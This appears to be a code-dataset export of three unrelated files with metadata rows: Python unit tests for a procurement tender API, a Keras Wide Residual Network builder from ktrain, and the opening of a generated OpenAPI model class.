self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
item0 = response.json['data']['items'][0]
item1 = response.json['data']['items'][1]
self.assertNotEqual(item0.pop('id'), item1.pop('id'))
self.assertEqual(item0, item1)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'items': [{}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(len(response.json['data']['items']), 1)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'items': [{"classification": {
"scheme": "ДК021",
"id": "44620000-2",
"description": "Cartons 2"
}}]}}, status=200)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'items': [{"classification": {
"scheme": "ДК021",
"id": "55523100-3",
"description": "Послуги з харчування у школах"
}}]}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't change classification")
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'items': [{"additionalClassifications": [
tender['items'][0]["additionalClassifications"][0] for i in range(3)
]}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {
'data': {'items': [{"additionalClassifications": tender['items'][0]["additionalClassifications"]}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'enquiryPeriod': {'endDate': new_dateModified2}}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't change enquiryPeriod")
self.set_status('complete')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'status': 'active.auction'}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't update tender in current (complete) status")
def patch_tender_period(self):
response = self.app.post_json('/tenders', {'data': self.initial_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
dateModified = tender.pop('dateModified')
self.tender_id = tender['id']
self.go_to_enquiryPeriod_end()
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {'data': {"description": "new description"}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "tenderPeriod should be extended by 7 days")
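        # extending tenderPeriod.endDate by at least seven days lifts the
        # restriction; the server then recomputes enquiryPeriod.endDate from
        # the new end (ten days before it, or ten minutes in sandbox mode)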
tenderPeriod_endDate = get_now() + timedelta(days=7, seconds=10)
enquiryPeriod_endDate = tenderPeriod_endDate - (timedelta(minutes=10) if SANDBOX_MODE else timedelta(days=10))
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {'data':
{
"description": "new description",
"tenderPeriod": {
"endDate": tenderPeriod_endDate.isoformat()
}
}
})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['tenderPeriod']['endDate'], tenderPeriod_endDate.isoformat())
self.assertEqual(response.json['data']['enquiryPeriod']['endDate'], enquiryPeriod_endDate.isoformat())
# TenderUAProcessTest
def invalid_bid_tender_features(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
data = deepcopy(self.initial_data)
data['features'] = [
{
"code": "OCDS-123454-POSTPONEMENT",
"featureOf": "tenderer",
"title": u"Відстрочка платежу",
"description": u"Термін відстрочки платежу",
"enum": [
{
"value": 0.05,
"title": u"До 90 днів"
},
{
"value": 0.1,
"title": u"Більше 90 днів"
}
]
}
]
response = self.app.post_json('/tenders',
{"data": data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'parameters': [{"code": "OCDS-123454-POSTPONEMENT", "value": 0.1}],
'tenderers': [test_organization], "value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
{"data": {"features": [{"code": "OCDS-123-POSTPONEMENT"}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual("OCDS-123-POSTPONEMENT", response.json['data']["features"][0]["code"])
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token),
{'data': {'parameters': [{"code": "OCDS-123-POSTPONEMENT"}],
'status': 'active'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual("OCDS-123-POSTPONEMENT", response.json['data']["parameters"][0]["code"])
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
{"data": {"features": [{"enum": [{"value": 0.2}]}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(0.2, response.json['data']["features"][0]["enum"][0]["value"])
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token),
{'data': {'parameters': [{"value": 0.2}],
'status': 'active'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual("OCDS-123-POSTPONEMENT", response.json['data']["parameters"][0]["code"])
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
{"data": {"features": []}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertNotIn("features", response.json['data'])
# switch to active.qualification
self.set_status('active.auction', {"auctionPeriod": {"startDate": None}, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
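        # a no-op patch from the chronograph user makes the server re-check
        # the tender and switch it to its next status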
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
self.assertNotEqual(response.json['data']['date'], tender['date'])
def invalid_bid_tender_lot(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
lots = []
for lot in test_lots * 2:
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token), {'data': lot})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
lots.append(response.json['data']['id'])
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'status': 'draft',
'lotValues': [{"value": {"amount": 500}, 'relatedLot': i} for i in lots],
'tenderers': [test_organization]}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.delete('/tenders/{}/lots/{}?acc_token={}'.format(tender_id, lots[0], owner_token))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
# switch to active.qualification
self.set_status('active.auction', {"auctionPeriod": {"startDate": None}, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
self.assertNotEqual(response.json['data']['date'], tender['date'])
def one_valid_bid_tender_ua(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender = response.json['data']
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# switch to active.tendering XXX temporary action.
response = self.set_status('active.tendering',
{"auctionPeriod": {"startDate": (get_now() + timedelta(days=16)).isoformat()}})
self.assertIn("auctionPeriod", response.json['data'])
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'tenderers': [test_organization], "value": {"amount": 500}}})
bid_id = self.bid_id = response.json['data']['id']
# switch to active.qualification
self.set_status('active.auction', {"auctionPeriod": {"startDate": None}, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
self.assertNotEqual(response.json['data']['date'], tender['date'])
def invalid1_and_1draft_bids_tender(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'tenderers': [test_organization], "value": {"amount": 500}}})
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True, 'status': 'draft',
'tenderers': [test_organization], "value": {"amount": 500}}})
# switch to active.qualification
self.set_status('active.auction', {"auctionPeriod": {"startDate": None}, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
# get awards
self.assertEqual(response.json['data']['status'], 'unsuccessful')
def activate_bid_after_adding_lot(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'tenderers': [test_organization], "value": {"amount": 500}}})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(
self.tender_id, owner_token), {'data': test_lots[0]})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
lot_id = response.json['data']['id']
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token))
self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token),
{'data': {'status': 'active', 'value': None,
'lotValues': [{"value": {"amount": 500}, 'relatedLot': lot_id}]}})
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token))
self.assertNotIn("value", response.json)
# switch to active.qualification
self.set_status('active.auction', {"auctionPeriod": {"startDate": None}, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
# get awards
self.assertEqual(response.json['data']['status'], 'unsuccessful')
def first_bid_tender(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# switch to active.tendering
self.set_status('active.tendering')
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'tenderers': [test_organization], "value": {"amount": 450}, 'selfEligible': True, 'selfQualified': True}})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
# create second bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'tenderers': [test_organization], "value": {"amount": 475}, 'selfEligible': True, 'selfQualified': True}})
# switch to active.auction
self.set_status('active.auction')
# get auction info
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(tender_id))
auction_bids_data = response.json['data']['bids']
# posting auction urls
response = self.app.patch_json('/tenders/{}/auction'.format(tender_id),
{
'data': {
'auctionUrl': 'https://tender.auction.url',
'bids': [
{
'id': i['id'],
'participationUrl': 'https://tender.auction.url/for_bid/{}'.format(i['id'])
}
for i in auction_bids_data
]
}
})
# view bid participationUrl
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid_id, bid_token))
self.assertEqual(response.json['data']['participationUrl'], 'https://tender.auction.url/for_bid/{}'.format(bid_id))
# posting auction results
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.post_json('/tenders/{}/auction'.format(tender_id),
{'data': {'bids': auction_bids_data}})
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
# set award as unsuccessful
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token),
{"data": {"status": "unsuccessful"}})
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award2_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
self.assertNotEqual(award_id, award2_id)
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award2_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
self.assertNotEqual(award_id, award2_id)
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
# set award as active
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token), {"data": {"status": "active", "qualified": True, "eligible": True}})
# get contract id
response = self.app.get('/tenders/{}'.format(tender_id))
contract_id = response.json['data']['contracts'][-1]['id']
# create tender contract document for test
response = self.app.post('/tenders/{}/contracts/{}/documents?acc_token={}'.format(tender_id, contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')], status=201)
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
self.assertIn(doc_id, response.headers['Location'])
        # after standstill period
self.app.authorization = ('Basic', ('chronograph', ''))
self.set_status('complete', {'status': 'active.awarded'})
# time travel
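        # collapse each award's complaintPeriod so the standstill period ends
        # immediately and the contract can be signed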
tender = self.db.get(tender_id)
for i in tender.get('awards', []):
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
# sign contract
self.app.authorization = ('Basic', ('broker', ''))
self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract_id, owner_token), {"data": {"status": "active"}})
# check status
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'complete')
response = self.app.post('/tenders/{}/contracts/{}/documents?acc_token={}'.format(tender_id, contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't add document in current (complete) tender status")
response = self.app.patch_json('/tenders/{}/contracts/{}/documents/{}?acc_token={}'.format(tender_id, contract_id, doc_id, owner_token), {"data": {"description": "document description"}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't update document in current (complete) tender status")
response = self.app.put('/tenders/{}/contracts/{}/documents/{}?acc_token={}'.format(tender_id, contract_id, doc_id, owner_token), upload_files=[('file', 'name.doc', 'content3')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't update document in current (complete) tender status")
def lost_contract_for_active_award(self):
self.app.authorization = ('Basic', ('broker', ''))
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create bid
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'tenderers': [test_organization], "value": {"amount": 450}}})
# create bid #2
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {'selfEligible': True, 'selfQualified': True,
'tenderers': [test_organization], "value": {"amount": 450}}})
# switch to active.auction
self.set_status('active.auction')
# get auction info
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(tender_id))
auction_bids_data = response.json['data']['bids']
# posting auction results
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.post_json('/tenders/{}/auction'.format(tender_id),
{'data': {'bids': auction_bids_data}})
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
# set award as active
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token),
{"data": {"status": "active", "qualified": True, "eligible": True}})
# lost contract
tender = self.db.get(tender_id)
tender['contracts'] = None
self.db.save(tender)
# check tender
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'active.awarded')
self.assertNotIn('contracts', response.json['data'])
self.assertIn('next_check', response.json['data'])
# create lost contract
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {"data": {"id": tender_id}})
self.assertEqual(response.json['data']['status'], 'active.awarded')
self.assertIn('contracts', response.json['data'])
self.assertNotIn('next_check', response.json['data'])
contract_id = response.json['data']['contracts'][-1]['id']
# time travel
tender = self.db.get(tender_id)
for i in tender.get('awards', []):
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
# sign contract
self.app.authorization = ('Basic', ('broker', ''))
self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract_id, owner_token),
{"data": {"status": "active"}})
# check status
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'complete')
| 52.004836 | 203 | 0.6316 | 5,981 | 53,773 | 5.569972 | 0.06203 | 0.104461 | 0.151888 | 0.066459 | 0.833764 | 0.807048 | 0.786006 | 0.773399 | 0.74137 | 0.734406 | 0 | 0.015685 | 0.193759 | 53,773 | 1,033 | 204 | 52.055179 | 0.752733 | 0.024324 | 0 | 0.623669 | 0 | 0.001183 | 0.271023 | 0.047849 | 0 | 0 | 0 | 0 | 0.342012 | 1 | 0.017751 | false | 0 | 0.008284 | 0 | 0.026036 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0efa0bc70cd0b0a818eeae8321271796c3948a31 | 7434 | py | Python | ktrain/vision/wrn.py | Niekvdplas/ktrain | 808a212a9b8ebddd4e2d75eaca2e54a7ea990b4e | ["Apache-2.0"] | null | null | null | ktrain/vision/wrn.py | Niekvdplas/ktrain | 808a212a9b8ebddd4e2d75eaca2e54a7ea990b4e | ["Apache-2.0"] | null | null | null | ktrain/vision/wrn.py | Niekvdplas/ktrain | 808a212a9b8ebddd4e2d75eaca2e54a7ea990b4e | ["Apache-2.0"] | null | null | null | from ..imports import *
weight_decay = 0.0005
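# 3x3 stem convolution (bias-free, L2-regularized) followed by BN + ReLU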
def initial_conv(input):
x = keras.layers.Convolution2D(
16,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(input)
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
return x
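# expanding residual block: two 3x3 convs on the main path plus a 1x1
# projection shortcut, used wherever the width (base * k) or stride changes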
def expand_conv(init, base, k, strides=(1, 1)):
x = keras.layers.Convolution2D(
base * k,
(3, 3),
padding="same",
strides=strides,
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(init)
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
base * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
skip = keras.layers.Convolution2D(
base * k,
(1, 1),
padding="same",
strides=strides,
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(init)
m = keras.layers.Add()([x, skip])
return m
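# identity residual block at width 16*k in pre-activation order
# (BN -> ReLU -> Conv), with optional dropout between the two 3x3 convs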
def conv1_block(input, k=1, dropout=0.0):
init = input
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(input)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
16 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
if dropout > 0.0:
x = keras.layers.Dropout(dropout)(x)
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
16 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
m = keras.layers.Add()([init, x])
return m
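# conv2_block and conv3_block repeat the same pre-activation block at
# widths 32*k and 64*k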
def conv2_block(input, k=1, dropout=0.0):
init = input
# channel_axis = 1 if K.image_dim_ordering() == "th" else -1
channel_axis = -1
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(input)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
32 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
if dropout > 0.0:
x = keras.layers.Dropout(dropout)(x)
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
32 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
m = keras.layers.Add()([init, x])
return m
def conv3_block(input, k=1, dropout=0.0):
init = input
# channel_axis = 1 if K.image_dim_ordering() == "th" else -1
channel_axis = -1
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(input)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
64 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
if dropout > 0.0:
x = keras.layers.Dropout(dropout)(x)
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = keras.layers.Convolution2D(
64 * k,
(3, 3),
padding="same",
kernel_initializer="he_normal",
kernel_regularizer=keras.regularizers.l2(weight_decay),
use_bias=False,
)(x)
m = keras.layers.Add()([init, x])
return m
def create_wide_residual_network(
input_dim, nb_classes=100, N=2, k=1, activation="softmax", dropout=0.0, verbose=1
):
"""
Creates a Wide Residual Network with specified parameters
    :param input_dim: shape tuple of the network input
:param nb_classes: Number of output classes
    :param N: Number of residual blocks per group; for a total depth n, compute N = (n - 4) / 6.
Example : For a depth of 16, n = 16, N = (16 - 4) / 6 = 2
Example2: For a depth of 28, n = 28, N = (28 - 4) / 6 = 4
Example3: For a depth of 40, n = 40, N = (40 - 4) / 6 = 6
:param k: Width of the network.
:param dropout: Adds dropout if value is greater than 0.0
:param verbose: Debug info to describe created WRN
:return:
"""
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
ip = keras.layers.Input(shape=input_dim)
x = initial_conv(ip)
nb_conv = 4
x = expand_conv(x, 16, k)
nb_conv += 2
for i in range(N - 1):
x = conv1_block(x, k, dropout)
nb_conv += 2
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = expand_conv(x, 32, k, strides=(2, 2))
nb_conv += 2
for i in range(N - 1):
x = conv2_block(x, k, dropout)
nb_conv += 2
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = expand_conv(x, 64, k, strides=(2, 2))
nb_conv += 2
for i in range(N - 1):
x = conv3_block(x, k, dropout)
nb_conv += 2
x = keras.layers.BatchNormalization(
axis=channel_axis, momentum=0.1, epsilon=1e-5, gamma_initializer="uniform"
)(x)
x = keras.layers.Activation("relu")(x)
x = keras.layers.AveragePooling2D((8, 8))(x)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(
nb_classes,
kernel_regularizer=keras.regularizers.l2(weight_decay),
activation=activation,
)(x)
model = keras.Model(ip, x)
if verbose:
print("Wide Residual Network-%d-%d created." % (nb_conv, k))
return model
if __name__ == "__main__":
init = (32, 32, 3)
    # N=2, k=2 builds WRN-16-2 (depth 6*2 + 4 = 16), matching the plot filename
    wrn_16_2 = create_wide_residual_network(init, nb_classes=10, N=2, k=2, dropout=0.0)
    wrn_16_2.summary()
    keras.utils.plot_model(
        wrn_16_2, "WRN-16-2.png", show_shapes=True, show_layer_names=True
)
| 27.533333 | 88 | 0.610035 | 1,002 | 7,434 | 4.377246 | 0.134731 | 0.107843 | 0.101231 | 0.062244 | 0.775878 | 0.76311 | 0.76311 | 0.752394 | 0.752394 | 0.752394 | 0 | 0.041682 | 0.254506 | 7,434 | 269 | 89 | 27.635688 | 0.749729 | 0.089454 | 0 | 0.795918 | 0 | 0 | 0.055125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030612 | false | 0 | 0.005102 | 0 | 0.066327 | 0.005102 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0efa1485445888e3e668d930ddd339e95670ceac | 6010 | py | Python | clients/python-flask/generated/openapi_server/models/extension_class_container_impl1map.py | PankTrue/swaggy-jenkins | aca35a7cca6e1fcc08bd399e05148942ac2f514b | ["MIT"] | 23 | 2017-08-01T12:25:26.000Z | 2022-01-25T03:44:11.000Z | clients/python-flask/generated/openapi_server/models/extension_class_container_impl1map.py | PankTrue/swaggy-jenkins | aca35a7cca6e1fcc08bd399e05148942ac2f514b | ["MIT"] | 35 | 2017-06-14T03:28:15.000Z | 2022-02-14T10:25:54.000Z | clients/python-flask/generated/openapi_server/models/extension_class_container_impl1map.py | PankTrue/swaggy-jenkins | aca35a7cca6e1fcc08bd399e05148942ac2f514b | ["MIT"] | 11 | 2017-08-31T19:00:20.000Z | 2021-12-19T12:04:12.000Z | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.extension_class_impl import ExtensionClassImpl # noqa: F401,E501
from openapi_server import util
class ExtensionClassContainerImpl1map(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
